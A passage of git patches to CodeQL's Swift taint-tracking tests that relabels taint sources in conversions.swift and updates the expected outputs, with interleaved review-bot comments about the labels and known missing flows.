sourceArray(_:) | conversions.swift:182:13:182:20 | ...[...] 
| result | -| conversions.swift:183:13:183:20 | ...[...] | conversions.swift:172:15:172:25 | call to sourceInt() | conversions.swift:183:13:183:20 | ...[...] | result | +| conversions.swift:183:13:183:20 | ...[...] | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:183:13:183:20 | ...[...] | result | | conversions.swift:187:13:187:13 | arr1c | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:187:13:187:13 | arr1c | result | -| conversions.swift:188:13:188:13 | arr2c | conversions.swift:172:15:172:25 | call to sourceInt() | conversions.swift:188:13:188:13 | arr2c | result | +| conversions.swift:188:13:188:13 | arr2c | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:188:13:188:13 | arr2c | result | | conversions.swift:189:13:189:20 | ...[...] | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:189:13:189:20 | ...[...] | result | -| conversions.swift:190:13:190:20 | ...[...] | conversions.swift:172:15:172:25 | call to sourceInt() | conversions.swift:190:13:190:20 | ...[...] 
| result | -| conversions.swift:206:13:206:13 | withUInt | conversions.swift:232:26:232:37 | call to sourceUInt() | conversions.swift:206:13:206:13 | withUInt | result | -| conversions.swift:212:13:212:25 | .v | conversions.swift:235:37:235:47 | call to sourceInt() | conversions.swift:212:13:212:25 | .v | result | -| conversions.swift:218:13:218:26 | .v | conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:218:13:218:26 | .v | result | -| conversions.swift:221:12:221:12 | self | conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:221:12:221:12 | self | result | -| conversions.swift:225:13:225:25 | .v | conversions.swift:241:43:241:53 | call to sourceInt() | conversions.swift:225:13:225:25 | .v | result | -| conversions.swift:238:12:238:50 | call to Int.init(withMyValue2:) | conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:238:12:238:50 | call to Int.init(withMyValue2:) | result | -| conversions.swift:241:12:241:55 | call to mkInt(withMyValue:) | conversions.swift:241:43:241:53 | call to sourceInt() | conversions.swift:241:12:241:55 | call to mkInt(withMyValue:) | result | +| conversions.swift:190:13:190:20 | ...[...] | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:190:13:190:20 | ...[...] 
| result | +| conversions.swift:206:13:206:13 | withUInt | conversions.swift:232:26:232:43 | call to sourceUInt(_:) | conversions.swift:206:13:206:13 | withUInt | result | +| conversions.swift:212:13:212:25 | .v | conversions.swift:235:37:235:53 | call to sourceInt(_:) | conversions.swift:212:13:212:25 | .v | result | +| conversions.swift:218:13:218:26 | .v | conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:218:13:218:26 | .v | result | +| conversions.swift:221:12:221:12 | self | conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:221:12:221:12 | self | result | +| conversions.swift:225:13:225:25 | .v | conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:225:13:225:25 | .v | result | +| conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | result | +| conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | result | | simple.swift:12:13:12:24 | ... .+(_:_:) ... | simple.swift:12:17:12:24 | call to source() | simple.swift:12:13:12:24 | ... .+(_:_:) ... | result | | simple.swift:13:13:13:24 | ... .+(_:_:) ... | simple.swift:13:13:13:20 | call to source() | simple.swift:13:13:13:24 | ... .+(_:_:) ... | result | | simple.swift:14:13:14:24 | ... .-(_:_:) ... | simple.swift:14:17:14:24 | call to source() | simple.swift:14:13:14:24 | ... .-(_:_:) ... | result | diff --git a/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected index 2a6b89d244c..0e6a9b75bcb 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected 
@@ -1,17 +1,17 @@ testFailures -| conversions.swift:33:30:34:1 | // $ tainted=33\n | Missing result: tainted=33 | -| conversions.swift:34:32:35:1 | // $ tainted=34\n | Missing result: tainted=34 | -| conversions.swift:58:16:59:1 | // $ tainted=57\n | Missing result: tainted=57 | -| conversions.swift:61:16:62:1 | // $ tainted=60\n | Missing result: tainted=60 | -| conversions.swift:69:42:70:1 | // $ tainted=69\n | Missing result: tainted=69 | -| conversions.swift:71:40:72:1 | // $ tainted=71\n | Missing result: tainted=71 | -| conversions.swift:72:43:73:1 | // $ tainted=72\n | Missing result: tainted=72 | -| conversions.swift:73:40:74:1 | // $ tainted=73\n | Missing result: tainted=73 | -| conversions.swift:74:50:75:1 | // $ tainted=74\n | Missing result: tainted=74 | -| conversions.swift:110:34:111:1 | // $ tainted=110\n | Missing result: tainted=110 | -| conversions.swift:130:38:131:1 | // $ tainted=130\n | Missing result: tainted=130 | -| conversions.swift:131:40:132:1 | // $ tainted=131\n | Missing result: tainted=131 | -| conversions.swift:166:38:167:1 | // $ tainted=166\n | Missing result: tainted=166 | -| conversions.swift:208:18:209:1 | // $ tainted=232\n | Missing result: tainted=232 | -| conversions.swift:232:41:233:1 | // $ tainted=232\n | Missing result: tainted=232 | +| conversions.swift:33:39:34:1 | // $ tainted=conv1-2\n | Missing result: tainted=conv1-2 | +| conversions.swift:34:41:35:1 | // $ tainted=conv1-3\n | Missing result: tainted=conv1-3 | +| conversions.swift:58:16:59:1 | // $ tainted=conv3-4\n | Missing result: tainted=conv3-4 | +| conversions.swift:61:16:62:1 | // $ tainted=conv3-5\n | Missing result: tainted=conv3-5 | +| conversions.swift:69:51:70:1 | // $ tainted=conv3-7\n | Missing result: tainted=conv3-7 | +| conversions.swift:71:49:72:1 | // $ tainted=conv4-1\n | Missing result: tainted=conv4-1 | +| conversions.swift:72:52:73:1 | // $ tainted=conv4-2\n | Missing result: tainted=conv4-2 | +| conversions.swift:73:49:74:1 | // $ 
tainted=conv4-3\n | Missing result: tainted=conv4-3 | +| conversions.swift:74:59:75:1 | // $ tainted=conv4-4\n | Missing result: tainted=conv4-4 | +| conversions.swift:110:43:111:1 | // $ tainted=conv7-3\n | Missing result: tainted=conv7-3 | +| conversions.swift:130:47:131:1 | // $ tainted=conv9-7\n | Missing result: tainted=conv9-7 | +| conversions.swift:131:49:132:1 | // $ tainted=conv9-8\n | Missing result: tainted=conv9-8 | +| conversions.swift:166:45:167:1 | // $ tainted=cenum\n | Missing result: tainted=cenum | +| conversions.swift:208:18:209:1 | // $ tainted=ext1\n | Missing result: tainted=ext1 | +| conversions.swift:232:47:233:1 | // $ tainted=ext1\n | Missing result: tainted=ext1 | failures diff --git a/swift/ql/test/library-tests/dataflow/taint/core/conversions.swift b/swift/ql/test/library-tests/dataflow/taint/core/conversions.swift index dc4b59ef062..910ee45a526 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/conversions.swift +++ b/swift/ql/test/library-tests/dataflow/taint/core/conversions.swift @@ -1,11 +1,11 @@ -func sourceInt() -> Int { 0 } -func sourceUInt() -> UInt { 0 } -func sourceUInt64() -> UInt64 { 0 } -func sourceFloat() -> Float { 0.0 } -func sourceFloat80() -> Float80 { 0.0 } -func sourceDouble() -> Double { 0.0 } -func sourceString() -> String { "" } +func sourceInt(_ label: String) -> Int { 0 } +func sourceUInt(_ label: String) -> UInt { 0 } +func sourceUInt64(_ label: String) -> UInt64 { 0 } +func sourceFloat(_ label: String) -> Float { 0.0 } +func sourceFloat80(_ label: String) -> Float80 { 0.0 } +func sourceDouble(_ label: String) -> Double { 0.0 } +func sourceString(_ label: String) -> String { "" } func sourceArray(_ label: String) -> [Int] { [] } func sink(arg: Any) { } 
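Review bot: The `label` parameter added to the seven `source*` stubs in this hunk is never read in any body, and nothing here says why it exists. Judging by the `// $ tainted=conv1-1` annotations in the following hunk, the string names the source so that an expectation binds to a specific source call rather than to a line number; how the test query reads it is not visible here. That scheme only stays meaningful if each label is used by a single source call, since a reused label would let flow from a different source satisfy an expectation and hide a missed or spurious taint step. I would add a comment above the stubs such as `// label is unused at runtime; it identifies the source in "$ tainted=<label>" expectations and must be unique per source call`.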
@@ -29,111 +29,111 @@ class MyString : LosslessStringConvertible, CustomStringConvertible, CustomDebug typealias MyInt = Int func testConversions() { - sink(arg: sourceInt()) // $ tainted=32 - sink(arg: Int(sourceInt())) // $ tainted=33 - sink(arg: UInt8(sourceInt())) // $ tainted=34 - sink(arg: Float(sourceInt())) // $ tainted=35 - sink(arg: String(sourceInt())) // $ tainted=36 - sink(arg: String(sourceInt()).utf8) // $ tainted=37 + sink(arg: sourceInt("conv1-1")) // $ tainted=conv1-1 + sink(arg: Int(sourceInt("conv1-2"))) // $ tainted=conv1-2 + sink(arg: UInt8(sourceInt("conv1-3"))) // $ tainted=conv1-3 + sink(arg: Float(sourceInt("conv1-4"))) // $ tainted=conv1-4 + sink(arg: String(sourceInt("conv1-5"))) // $ tainted=conv1-5 + sink(arg: String(sourceInt("conv1-6")).utf8) // $ tainted=conv1-6 - let arr = [1, 2, sourceInt()] - sink(arg: arr) // $ tainted=39 - sink(arg: arr[0]) // $ tainted=39 - sink(arg: [MyInt](arr)) // $ tainted=39 - sink(arg: [MyInt](arr)[0]) // $ tainted=39 - sink(arg: [UInt8](sourceString().utf8)) // $ tainted=44 - sink(arg: [UInt8](sourceString().utf8)[0]) // $ tainted=45 + let arr = [1, 2, sourceInt("conv2-1")] + sink(arg: arr) // $ tainted=conv2-1 + sink(arg: arr[0]) // $ tainted=conv2-1 + sink(arg: [MyInt](arr)) // $ tainted=conv2-1 + sink(arg: [MyInt](arr)[0]) // $ tainted=conv2-1 + sink(arg: [UInt8](sourceString("conv2-2").utf8)) // $ tainted=conv2-2 + sink(arg: [UInt8](sourceString("conv2-3").utf8)[0]) // $ tainted=conv2-3 - if let v = sourceInt() as? UInt { - sink(arg: v) // $ tainted=47 + if let v = sourceInt("conv3-1") as? 
UInt { + sink(arg: v) // $ tainted=conv3-1 } - let v2: UInt8 = numericCast(sourceInt()) - sink(arg: v2) // $ tainted=51 + let v2: UInt8 = numericCast(sourceInt("conv3-2")) + sink(arg: v2) // $ tainted=conv3-2 - let v4: UInt = unsafeBitCast(sourceInt(), to: UInt.self) - sink(arg: v4) // $ tainted=54 + let v4: UInt = unsafeBitCast(sourceInt("conv3-3"), to: UInt.self) + sink(arg: v4) // $ tainted=conv3-3 - let v5 = UInt(truncatingIfNeeded: sourceInt()) - sink(arg: v5) // $ tainted=57 + let v5 = UInt(truncatingIfNeeded: sourceInt("conv3-4")) + sink(arg: v5) // $ tainted=conv3-4 - let v6 = UInt(bitPattern: sourceInt()) - sink(arg: v6) // $ tainted=60 + let v6 = UInt(bitPattern: sourceInt("conv3-5")) + sink(arg: v6) // $ tainted=conv3-5 - let v7 = abs(sourceInt()) - sink(arg: v7) // $ tainted=63 + let v7 = abs(sourceInt("conv3-6")) + sink(arg: v7) // $ tainted=conv3-6 let v8 = UInt64(0) sink(arg: v8) sink(arg: v8.advanced(by: 1)) - sink(arg: v8.advanced(by: sourceInt())) // $ tainted=69 + sink(arg: v8.advanced(by: sourceInt("conv3-7"))) // $ tainted=conv3-7 - sink(arg: Int(exactly: sourceInt())!) // $ tainted=71 - sink(arg: UInt32(exactly: sourceInt())!) // $ tainted=72 - sink(arg: Int(clamping: sourceInt())) // $ tainted=73 - sink(arg: Int(truncatingIfNeeded: sourceInt())) // $ tainted=74 - sink(arg: Int(sourceString(), radix: 10)!) // $ tainted=75 + sink(arg: Int(exactly: sourceInt("conv4-1"))!) // $ tainted=conv4-1 + sink(arg: UInt32(exactly: sourceInt("conv4-2"))!) // $ tainted=conv4-2 + sink(arg: Int(clamping: sourceInt("conv4-3"))) // $ tainted=conv4-3 + sink(arg: Int(truncatingIfNeeded: sourceInt("conv4-4"))) // $ tainted=conv4-4 + sink(arg: Int(sourceString("conv4-5"), radix: 10)!) 
// $ tainted=conv4-5 - sink(arg: Int(littleEndian: sourceInt())) // $ tainted=77 - sink(arg: Int(bigEndian: sourceInt())) // $ tainted=78 - sink(arg: sourceInt().littleEndian) // $ tainted=79 - sink(arg: sourceInt().bigEndian) // $ tainted=80 + sink(arg: Int(littleEndian: sourceInt("conv5-1"))) // $ tainted=conv5-1 + sink(arg: Int(bigEndian: sourceInt("conv5-2"))) // $ tainted=conv5-2 + sink(arg: sourceInt("conv5-3").littleEndian) // $ tainted=conv5-3 + sink(arg: sourceInt("conv5-4").bigEndian) // $ tainted=conv5-4 let (q1, r1) = 1000.quotientAndRemainder(dividingBy: 2) sink(arg: q1) sink(arg: r1) - let (q2, r2) = sourceInt().quotientAndRemainder(dividingBy: 2) - sink(arg: q2) // $ MISSING: tainted=86 - sink(arg: r2) // $ MISSING: tainted=86 + let (q2, r2) = sourceInt("conv6-1").quotientAndRemainder(dividingBy: 2) + sink(arg: q2) // $ MISSING: tainted=conv6-1 + sink(arg: r2) // $ MISSING: tainted=conv6-1 - let (q3, r3) = 1000.quotientAndRemainder(dividingBy: sourceInt()) - sink(arg: q3) // $ MISSING: tainted=90 - sink(arg: r3) // $ MISSING: tainted=90 + let (q3, r3) = 1000.quotientAndRemainder(dividingBy: sourceInt("conv6-2")) + sink(arg: q3) // $ MISSING: tainted=conv6-2 + sink(arg: r3) // $ MISSING: tainted=conv6-2 let pair1 = 1000.addingReportingOverflow(2) sink(arg: pair1.0) // part sink(arg: pair1.1) // overflow - let pair2 = sourceInt().addingReportingOverflow(2) - sink(arg: pair2.0) // $ MISSING: tainted=98 + let pair2 = sourceInt("conv6-3").addingReportingOverflow(2) + sink(arg: pair2.0) // $ MISSING: tainted=conv6-3 sink(arg: pair2.1) - let pair3 = 1000.addingReportingOverflow(sourceInt()) - sink(arg: pair3.0) // $ MISSING: tainted=102 + let pair3 = 1000.addingReportingOverflow(sourceInt("conv6-4")) + sink(arg: pair3.0) // $ MISSING: tainted=conv6-4 sink(arg: pair3.1) // --- - sink(arg: sourceFloat()) // $ tainted=108 - sink(arg: Float(sourceFloat())) // $ tainted=109 - sink(arg: UInt8(sourceFloat())) // $ tainted=110 - sink(arg: String(sourceFloat())) // 
$ tainted=111 - sink(arg: String(sourceFloat()).utf8) // $ tainted=112 - sink(arg: String(sourceFloat80())) // $ tainted=113 - sink(arg: String(sourceFloat80()).utf8) // $ tainted=114 - sink(arg: String(sourceDouble())) // $ tainted=115 - sink(arg: String(sourceDouble()).utf8) // $ tainted=116 + sink(arg: sourceFloat("conv7-1")) // $ tainted=conv7-1 + sink(arg: Float(sourceFloat("conv7-2"))) // $ tainted=conv7-2 + sink(arg: UInt8(sourceFloat("conv7-3"))) // $ tainted=conv7-3 + sink(arg: String(sourceFloat("conv7-4"))) // $ tainted=conv7-4 + sink(arg: String(sourceFloat("conv7-5")).utf8) // $ tainted=conv7-5 + sink(arg: String(sourceFloat80("conv7-6"))) // $ tainted=conv7-6 + sink(arg: String(sourceFloat80("conv7-7")).utf8) // $ tainted=conv7-7 + sink(arg: String(sourceDouble("conv7-8"))) // $ tainted=conv7-8 + sink(arg: String(sourceDouble("conv7-9")).utf8) // $ tainted=conv7-9 - sink(arg: Float(sourceFloat())) // $ tainted=118 - sink(arg: Float(sign: .plus, exponent: sourceInt(), significand: 0.0)) // $ tainted=119 - sink(arg: Float(sign: .plus, exponent: 0, significand: sourceFloat())) // $ tainted=120 - sink(arg: Float(signOf: sourceFloat(), magnitudeOf: 0.0)) // (good) - sink(arg: Float(signOf: 0.0, magnitudeOf: sourceFloat())) // $ tainted=122 + sink(arg: Float(sourceFloat("conv8-1"))) // $ tainted=conv8-1 + sink(arg: Float(sign: .plus, exponent: sourceInt("conv8-2"), significand: 0.0)) // $ tainted=conv8-2 + sink(arg: Float(sign: .plus, exponent: 0, significand: sourceFloat("conv8-3"))) // $ tainted=conv8-3 + sink(arg: Float(signOf: sourceFloat("conv8-4"), magnitudeOf: 0.0)) // (good) + sink(arg: Float(signOf: 0.0, magnitudeOf: sourceFloat("conv8-5"))) // $ tainted=conv8-5 - sink(arg: sourceFloat().exponent) // $ tainted=124 - sink(arg: sourceFloat().significand) // $ tainted=125 - sink(arg: sourceFloat80().exponent) // $ tainted=126 - sink(arg: sourceFloat80().significand) // $ tainted=127 - sink(arg: sourceDouble().exponent) // $ tainted=128 - sink(arg: 
sourceDouble().significand) // $ tainted=129 - sink(arg: sourceUInt().byteSwapped) // $ tainted=130 - sink(arg: sourceUInt64().byteSwapped) // $ tainted=131 + sink(arg: sourceFloat("conv9-1").exponent) // $ tainted=conv9-1 + sink(arg: sourceFloat("conv9-2").significand) // $ tainted=conv9-2 + sink(arg: sourceFloat80("conv9-3").exponent) // $ tainted=conv9-3 + sink(arg: sourceFloat80("conv9-4").significand) // $ tainted=conv9-4 + sink(arg: sourceDouble("conv9-5").exponent) // $ tainted=conv9-5 + sink(arg: sourceDouble("conv9-6").significand) // $ tainted=conv9-6 + sink(arg: sourceUInt("conv9-7").byteSwapped) // $ tainted=conv9-7 + sink(arg: sourceUInt64("conv9-8").byteSwapped) // $ tainted=conv9-8 // --- - sink(arg: sourceString()) // $ tainted=135 - sink(arg: String(sourceString())) // $ tainted=136 + sink(arg: sourceString("conv10-1")) // $ tainted=conv10-1 + sink(arg: String(sourceString("conv10-2"))) // $ tainted=conv10-2 let ms1 = MyString("abc")! sink(arg: ms1) 
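Review bot: Several relabelled sinks in this hunk carry a plain `// $ tainted=…` annotation although the expected-output hunk of the same patch lists them under `testFailures` as `Missing result`: conv1-2, conv1-3, conv3-4, conv3-5, conv3-7, conv4-1 to conv4-4, conv7-3, conv9-7 and conv9-8 here, plus `cenum` and `ext1` in the later hunks. As written, the baseline appears to accept that taint is lost through `Int(_:)`, `UInt8(_:)`, `UInt(truncatingIfNeeded:)`, `UInt(bitPattern:)`, `advanced(by:)`, `init(exactly:)`, `init(clamping:)` and `byteSwapped`. Queries that rely on this library would then presumably under-report data passing through those conversions. Until the flow is modelled, I would mark them the way conv6-1 already is, e.g. `sink(arg: Int(sourceInt("conv1-2"))) // $ MISSING: tainted=conv1-2`, so that `testFailures` stays empty and a new regression is not hidden among known gaps. The body of testConversions continues outside this hunk.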
@@ -141,21 +141,21 @@ func testConversions() { sink(arg: ms1.debugDescription) sink(arg: ms1.clean) - let ms2 = MyString(sourceString())! - sink(arg: ms2) // $ tainted=144 - sink(arg: ms2.description) // $ tainted=144 - sink(arg: ms2.debugDescription) // $ tainted=144 + let ms2 = MyString(sourceString("conv11-1"))! + sink(arg: ms2) // $ tainted=conv11-1 + sink(arg: ms2.description) // $ tainted=conv11-1 + sink(arg: ms2.debugDescription) // $ tainted=conv11-1 sink(arg: ms2.clean) // --- - let parent : MyParentClass = sourceString() as! MyChildClass - sink(arg: parent) // $ tainted=152 - sink(arg: parent as! MyChildClass) // $ tainted=152 + let parent : MyParentClass = sourceString("conv12-1") as! MyChildClass + sink(arg: parent) // $ tainted=conv12-1 + sink(arg: parent as! MyChildClass) // $ tainted=conv12-1 let v3: MyChildClass = unsafeDowncast(parent, to: MyChildClass.self) - sink(arg: v3) // $ tainted=152 - sink(arg: v3 as! MyParentClass) // $ tainted=152 + sink(arg: v3) // $ tainted=conv12-1 + sink(arg: v3 as! MyParentClass) // $ tainted=conv12-1 } var myCEnumConst : Int = 0 
@@ -163,31 +163,31 @@ typealias MyCEnumType = UInt32 func testCEnum() { sink(arg: MyCEnumType(myCEnumConst)) - sink(arg: MyCEnumType(sourceInt())) // $ tainted=166 + sink(arg: MyCEnumType(sourceInt("cenum"))) // $ tainted=cenum } class TestArrayConversion { init() { let arr1 = sourceArray("init1") - let arr2 = [sourceInt()] + let arr2 = [sourceInt("init2")] sink(arg: arr1) // $ tainted=init1 - sink(arg: arr2) // $ tainted=172 + sink(arg: arr2) // $ tainted=init2 sink(arg: arr1[0]) // $ tainted=init1 - sink(arg: arr2[0]) // $ tainted=172 + sink(arg: arr2[0]) // $ tainted=init2 let arr1b = try Array(arr1) let arr2b = try Array(arr2) sink(arg: arr1b) // $ tainted=init1 - sink(arg: arr2b) // $ tainted=172 + sink(arg: arr2b) // $ tainted=init2 sink(arg: arr1b[0]) // $ tainted=init1 - sink(arg: arr2b[0]) // $ tainted=172 + sink(arg: arr2b[0]) // $ tainted=init2 let arr1c = ContiguousArray(arr1) let arr2c = ContiguousArray(arr2) sink(arg: arr1c) // $ tainted=init1 - sink(arg: arr2c) // $ tainted=172 + sink(arg: arr2c) // $ tainted=init2 sink(arg: arr1c[0]) // $ tainted=init1 - sink(arg: arr2c[0]) // $ tainted=172 + sink(arg: arr2c[0]) // $ tainted=init2 } } 
@@ -203,40 +203,40 @@ class MyValue { extension Int { init(withUInt: UInt) { - sink(arg: withUInt) // $ tainted=232 + sink(arg: withUInt) // $ tainted=ext1 self = Int(withUInt) - sink(arg:self) // $ tainted=232 + sink(arg:self) // $ tainted=ext1 } init(withMyValue: MyValue) { - sink(arg: withMyValue.v) // $ tainted=235 + sink(arg: withMyValue.v) // $ tainted=ext2 self = withMyValue.v - sink(arg:self) // $ MISSING: tainted=235 + sink(arg:self) // $ MISSING: tainted=ext2 } init(withMyValue2: MyValue) { - sink(arg: withMyValue2.v) // $ tainted=238 + sink(arg: withMyValue2.v) // $ tainted=ext3 let x = withMyValue2.v self = x - sink(arg:self) // $ tainted=238 + sink(arg:self) // $ tainted=ext3 } static func mkInt(withMyValue: MyValue) -> Int { - sink(arg: withMyValue.v) // $ tainted=241 + sink(arg: withMyValue.v) // $ tainted=ext4 return withMyValue.v } } func testIntExtensions() { sink(arg: Int(withUInt: 0)) - sink(arg: Int(withUInt: sourceUInt())) // $ tainted=232 + sink(arg: Int(withUInt: sourceUInt("ext1"))) // $ tainted=ext1 sink(arg: Int(withMyValue: MyValue(0))) - sink(arg: Int(withMyValue: MyValue(sourceInt()))) // $ MISSING: tainted=235 + sink(arg: Int(withMyValue: MyValue(sourceInt("ext2")))) // $ MISSING: tainted=ext2 sink(arg: Int(withMyValue2: MyValue(0))) - sink(arg: Int(withMyValue2: MyValue(sourceInt()))) // $ tainted=238 + sink(arg: Int(withMyValue2: MyValue(sourceInt("ext3")))) // $ tainted=ext3 sink(arg: Int.mkInt(withMyValue: MyValue(0))) - sink(arg: Int.mkInt(withMyValue: MyValue(sourceInt()))) // $ tainted=241 + sink(arg: Int.mkInt(withMyValue: MyValue(sourceInt("ext4")))) // $ tainted=ext4 } From 570393fe2bd6426d435dfaf32f60d39f185bc365 Mon Sep 17 00:00:00 2001 
From: Geoffrey White <40627776+geoffw0@users.noreply.github.com>
Date: Thu, 14 Nov 2024 16:21:14 +0000
Subject: [PATCH 0699/1267] Swift: Additional test cases.
---
.../dataflow/taint/core/LocalTaint.expected | 494 ++++++------
.../dataflow/taint/core/Taint.expected | 748 +++++++++---------
.../dataflow/taint/core/TaintInline.expected | 41 +-
.../dataflow/taint/core/conversions.swift | 56 +-
4 files changed, 714 insertions(+), 625 deletions(-)
diff --git a/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected b/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected
index c0a08c715a8..a25101527f5 100644
--- a/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected
+++ b/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected
@@ -17,243 +17,263 @@ | conversions.swift:25:33:25:33 | self | conversions.swift:25:33:25:33 | SSA def(self) | | conversions.swift:26:22:26:22 | SSA def(self) | conversions.swift:26:22:26:38 | self[return] | | conversions.swift:26:22:26:22 | self | conversions.swift:26:22:26:22 | SSA def(self) | -| conversions.swift:35:18:35:37 | call to sourceInt(_:) | conversions.swift:35:12:35:38 | call to Float.init(_:) | -| conversions.swift:36:19:36:38 | call to sourceInt(_:) | conversions.swift:36:12:36:39 | call to String.init(_:) | -| conversions.swift:37:12:37:39 | call to String.init(_:) | conversions.swift:37:12:37:41 | .utf8 | -| conversions.swift:37:19:37:38 | call to sourceInt(_:) | conversions.swift:37:12:37:39 | call to String.init(_:) | -| conversions.swift:39:6:39:6 | SSA def(arr) | conversions.swift:40:12:40:12 | arr | -| conversions.swift:39:6:39:6 | arr | conversions.swift:39:6:39:6 | SSA def(arr) | -| conversions.swift:39:12:39:39 | [...] | conversions.swift:39:6:39:6 | arr | -| conversions.swift:40:12:40:12 | arr | conversions.swift:41:12:41:12 | arr | -| conversions.swift:41:12:41:12 | [post] arr | conversions.swift:42:20:42:20 | arr | -| conversions.swift:41:12:41:12 | arr | conversions.swift:41:12:41:17 | ...[...] | -| conversions.swift:41:12:41:12 | arr | conversions.swift:42:20:42:20 | arr | -| conversions.swift:42:20:42:20 | arr | conversions.swift:43:20:43:20 | arr | -| conversions.swift:43:12:43:23 | call to Array.init(_:) | conversions.swift:43:12:43:26 | ...[...] | -| conversions.swift:44:20:44:42 | call to sourceString(_:) | conversions.swift:44:20:44:44 | .utf8 | -| conversions.swift:45:12:45:48 | call to Array.init(_:) | conversions.swift:45:12:45:51 | ...[...] | -| conversions.swift:45:20:45:42 | call to sourceString(_:) | conversions.swift:45:20:45:44 | .utf8 | -| conversions.swift:47:5:47:9 | let ...? 
| conversions.swift:47:9:47:9 | v | -| conversions.swift:47:9:47:9 | SSA def(v) | conversions.swift:48:13:48:13 | v | -| conversions.swift:47:9:47:9 | v | conversions.swift:47:9:47:9 | SSA def(v) | -| conversions.swift:47:13:47:32 | call to sourceInt(_:) | conversions.swift:47:5:47:9 | let ...? | -| conversions.swift:51:6:51:6 | SSA def(v2) | conversions.swift:52:12:52:12 | v2 | -| conversions.swift:51:6:51:6 | v2 | conversions.swift:51:6:51:6 | SSA def(v2) | -| conversions.swift:51:6:51:10 | ... as ... | conversions.swift:51:6:51:6 | v2 | -| conversions.swift:51:18:51:50 | call to numericCast(_:) | conversions.swift:51:6:51:10 | ... as ... | -| conversions.swift:51:30:51:49 | call to sourceInt(_:) | conversions.swift:51:18:51:50 | call to numericCast(_:) | -| conversions.swift:54:6:54:6 | SSA def(v4) | conversions.swift:55:12:55:12 | v4 | -| conversions.swift:54:6:54:6 | v4 | conversions.swift:54:6:54:6 | SSA def(v4) | -| conversions.swift:54:6:54:10 | ... as ... | conversions.swift:54:6:54:6 | v4 | -| conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | conversions.swift:54:6:54:10 | ... as ... 
| -| conversions.swift:54:31:54:50 | call to sourceInt(_:) | conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | -| conversions.swift:57:6:57:6 | SSA def(v5) | conversions.swift:58:12:58:12 | v5 | -| conversions.swift:57:6:57:6 | v5 | conversions.swift:57:6:57:6 | SSA def(v5) | -| conversions.swift:57:11:57:56 | call to Self.init(truncatingIfNeeded:) | conversions.swift:57:6:57:6 | v5 | -| conversions.swift:60:6:60:6 | SSA def(v6) | conversions.swift:61:12:61:12 | v6 | -| conversions.swift:60:6:60:6 | v6 | conversions.swift:60:6:60:6 | SSA def(v6) | -| conversions.swift:60:11:60:48 | call to UInt.init(bitPattern:) | conversions.swift:60:6:60:6 | v6 | -| conversions.swift:63:6:63:6 | SSA def(v7) | conversions.swift:64:12:64:12 | v7 | -| conversions.swift:63:6:63:6 | v7 | conversions.swift:63:6:63:6 | SSA def(v7) | -| conversions.swift:63:11:63:35 | call to abs(_:) | conversions.swift:63:6:63:6 | v7 | -| conversions.swift:63:15:63:34 | call to sourceInt(_:) | conversions.swift:63:11:63:35 | call to abs(_:) | -| conversions.swift:66:6:66:6 | SSA def(v8) | conversions.swift:67:12:67:12 | v8 | -| conversions.swift:66:6:66:6 | v8 | conversions.swift:66:6:66:6 | SSA def(v8) | -| conversions.swift:66:18:66:18 | 0 | conversions.swift:66:6:66:6 | v8 | -| conversions.swift:67:12:67:12 | [post] v8 | conversions.swift:68:12:68:12 | v8 | -| conversions.swift:67:12:67:12 | v8 | conversions.swift:68:12:68:12 | v8 | -| conversions.swift:68:12:68:12 | [post] v8 | conversions.swift:69:12:69:12 | v8 | -| conversions.swift:68:12:68:12 | v8 | conversions.swift:69:12:69:12 | v8 | -| conversions.swift:71:12:71:45 | call to Self.init(exactly:) | conversions.swift:71:12:71:46 | ...! | -| conversions.swift:72:12:72:48 | call to Self.init(exactly:) | conversions.swift:72:12:72:49 | ...! | -| conversions.swift:75:12:75:50 | call to Self.init(_:radix:) | conversions.swift:75:12:75:51 | ...! 
| -| conversions.swift:77:30:77:49 | call to sourceInt(_:) | conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | -| conversions.swift:78:27:78:46 | call to sourceInt(_:) | conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | -| conversions.swift:79:12:79:31 | call to sourceInt(_:) | conversions.swift:79:12:79:33 | .littleEndian | -| conversions.swift:80:12:80:31 | call to sourceInt(_:) | conversions.swift:80:12:80:33 | .bigEndian | -| conversions.swift:82:7:82:7 | SSA def(q1) | conversions.swift:83:12:83:12 | q1 | -| conversions.swift:82:7:82:7 | q1 | conversions.swift:82:7:82:7 | SSA def(q1) | -| conversions.swift:82:11:82:11 | SSA def(r1) | conversions.swift:84:12:84:12 | r1 | -| conversions.swift:82:11:82:11 | r1 | conversions.swift:82:11:82:11 | SSA def(r1) | -| conversions.swift:82:17:82:56 | call to quotientAndRemainder(dividingBy:) | conversions.swift:82:6:82:13 | (...) | -| conversions.swift:86:7:86:7 | SSA def(q2) | conversions.swift:87:12:87:12 | q2 | -| conversions.swift:86:7:86:7 | q2 | conversions.swift:86:7:86:7 | SSA def(q2) | -| conversions.swift:86:11:86:11 | SSA def(r2) | conversions.swift:88:12:88:12 